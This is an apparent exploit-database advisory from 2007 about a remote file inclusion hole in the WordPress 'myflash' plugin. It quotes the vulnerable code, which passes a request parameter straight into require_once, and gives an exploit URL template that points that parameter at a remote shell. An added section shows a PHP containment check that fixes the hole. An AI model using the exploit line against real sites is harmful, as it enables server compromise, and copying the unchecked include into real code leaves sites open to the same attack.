--------------------------------- [ The World Is So Treacherous ! ] --------------------------------------
Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: cybermilitan@hotmail.com
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
Application : Wordpress plugin
Web Site : http://alexrabe.boelinger.com/
--------------------------------------------------------------------------------
Vuln in myflash-button.php

// wpPATH is read straight from the request (GET, or POST when a form is submitted)
if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

// ...and is used unchecked as the prefix of both include paths
require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------
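One way to close the hole shown above, as an added example that is not the plugin author's code: the include prefix is accepted only if it resolves to a local directory under a fixed base and contains wp-config.php. The function name safe_wp_root(), the parameter $allowedBase and the demo directory tree are assumptions made for illustration; dropping the wpPATH request parameter entirely and deriving the path from the plugin's own location is the stronger fix.

```php
<?php
// Added example, not the plugin's code. safe_wp_root() and $allowedBase are
// hypothetical names; the directory tree below is constructed for the demo.

/**
 * Return the canonical WordPress root for $candidate, or null to reject it.
 * Accepted only if it resolves on the local filesystem to $allowedBase, or a
 * directory beneath it, that actually contains wp-config.php.
 */
function safe_wp_root(string $candidate, string $allowedBase): ?string
{
    // Refuse NUL bytes and anything shaped like a stream wrapper (scheme:...).
    // Two or more scheme characters, so a Windows drive letter is not caught.
    if (strpos($candidate, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]+:#i', $candidate)) {
        return null;
    }
    $base = realpath($allowedBase);
    $real = realpath($candidate);   // resolves ../ and symlinks; false if absent
    if ($base === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Base itself or strictly inside it; the trailing separator stops
    // /var/www2 from passing as a child of /var/www.
    $sep = DIRECTORY_SEPARATOR;
    $inside = $real === $base || strncmp($real, $base . $sep, strlen($base) + 1) === 0;
    if (!$inside || !is_file($real . $sep . 'wp-config.php')) {
        return null;
    }
    return $real;
}

// Constructed demo tree standing in for a WordPress install.
$base = sys_get_temp_dir() . '/wp_demo_' . getmypid();
mkdir($base . '/blog', 0700, true);
file_put_contents($base . '/blog/wp-config.php', "<?php // placeholder\n");

$samples = [
    $base . '/blog',              // legitimate local root: accepted
    $base . '/blog/../..',        // resolves outside the allowed base: rejected
    'http://example.invalid/x',   // remote wrapper as the include prefix: rejected
    $base . '/missing',           // nonexistent directory: rejected
];
foreach ($samples as $s) {
    printf("%-45s => %s\n", $s, safe_wp_root($s, $base) ?? 'REJECTED');
}
// Remove the demo tree again.
unlink($base . '/blog/wp-config.php');
rmdir($base . '/blog');
rmdir($base);
```

With `allow_url_include` off (the PHP default), `require_once` already refuses remote wrappers, but the same parameter still permits inclusion of arbitrary local paths, which is why the containment check is needed as well.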
Exploit:
http://[target]/[path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
--------------------------------------------------------------------------------
greets:
Every Body
--------------------------------------------------------------------------------
--------------------------------- [http://www.biyosecurity.net ] --------------------------------------
# milw0rm.com [2007-05-01]